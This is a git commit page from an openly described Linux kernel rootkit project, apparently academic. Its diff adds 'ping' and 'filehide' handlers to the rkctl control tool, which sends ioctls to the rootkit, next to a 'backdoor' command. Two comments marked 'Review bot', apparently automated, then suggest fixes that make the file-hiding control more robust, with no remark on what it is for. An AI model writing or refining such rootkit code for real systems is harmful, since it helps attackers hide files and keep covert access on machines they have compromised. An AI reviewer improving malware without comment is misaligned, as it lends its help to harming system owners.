linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 78d60743f7d078d219f8d01dfefd43b664f1105c
parent 5db40f80b15f67ccbef6375f6f953268c8f513f2
Author: deurzen <m.deurzen@tum.de>
Date:   Fri, 27 Nov 2020 08:38:25 +0100

adds ping handler

Diffstat:
Msrc/rkctl/rkctl.c | 15+++++++++++----
1 file changed, 11 insertions(+), 4 deletions(-)

diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -31,14 +31,20 @@ parse_input(int argc, char **argv)
 exit(0);
 }
- if (ARGVCMP(1, "ping")) {
+ if (ARGVCMP(1, "ping"))
 return (cmd_t){ handle_ping, NULL };
- // TODO: return ping handle
- }
 if (ARGVCMP(1, "filehide")) {
 ASSERT_ARGC(2, "filehide <toggle | on | off>");
- // TODO: return filehide handle
+
+ if (ARGVCMP(2, "toggle"))
+ return (cmd_t){ handle_filehide, (void *)0 };
+
+ if (ARGVCMP(2, "on"))
+ return (cmd_t){ handle_filehide, (void *)1 };
+
+ if (ARGVCMP(2, "off"))
+ return (cmd_t){ handle_filehide, (void *)-1 };
 }
 if (ARGVCMP(1, "backdoor")) {
@@ -69,6 +75,7 @@ handle_ping(void *arg)
 int
 handle_filehide(void *arg)
 {
+ return issue_ioctl(G7_FILEHIDE, (char *)arg);
 }
 int
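Review bot: The `filehide` branch only validates the argument count through ASSERT_ARGC, so an invocation like `rkctl filehide bogus` matches none of the three new `ARGVCMP(2, ...)` checks and falls out of the `if` block into the `backdoor` comparison and whatever follows it, instead of failing with the usage text the assertion already spells out. Add an explicit reject after the `off` case, e.g. `fprintf(stderr, "usage: filehide <toggle | on | off>\n"); exit(1);` (or whatever path ASSERT_ARGC takes on a bad count, if it prints usage — its body is not in the hunk). The mode is also encoded as `(void *)0`, `(void *)1` and `(void *)-1`, which reads as three pointers rather than three integers; named constants such as `enum { FH_TOGGLE = 0, FH_ON = 1, FH_OFF = -1 }` would make the encoding and its later cast self-describing. parse_input begins and ends outside the hunk.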
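Review bot: `handle_filehide` casts `arg` to `char *` before handing it to issue_ioctl, but the values parse_input supplies in the first hunk are the integers 0, 1 and -1 cast to `void *`, not a buffer; if issue_ioctl (not visible here) ever dereferences or copies from that pointer, this call reads address 1 or `(char *)-1`. Either state the integer-through-pointer contract above the return — `/* arg is not a string: it carries the mode (0 toggle, 1 on, -1 off) as an integer smuggled through the pointer; issue_ioctl must pass it through as the raw ioctl argument */` — or, better, unpack it with `(intptr_t)arg` and give issue_ioctl an integer parameter so the cast disappears. The function is complete within the hunk.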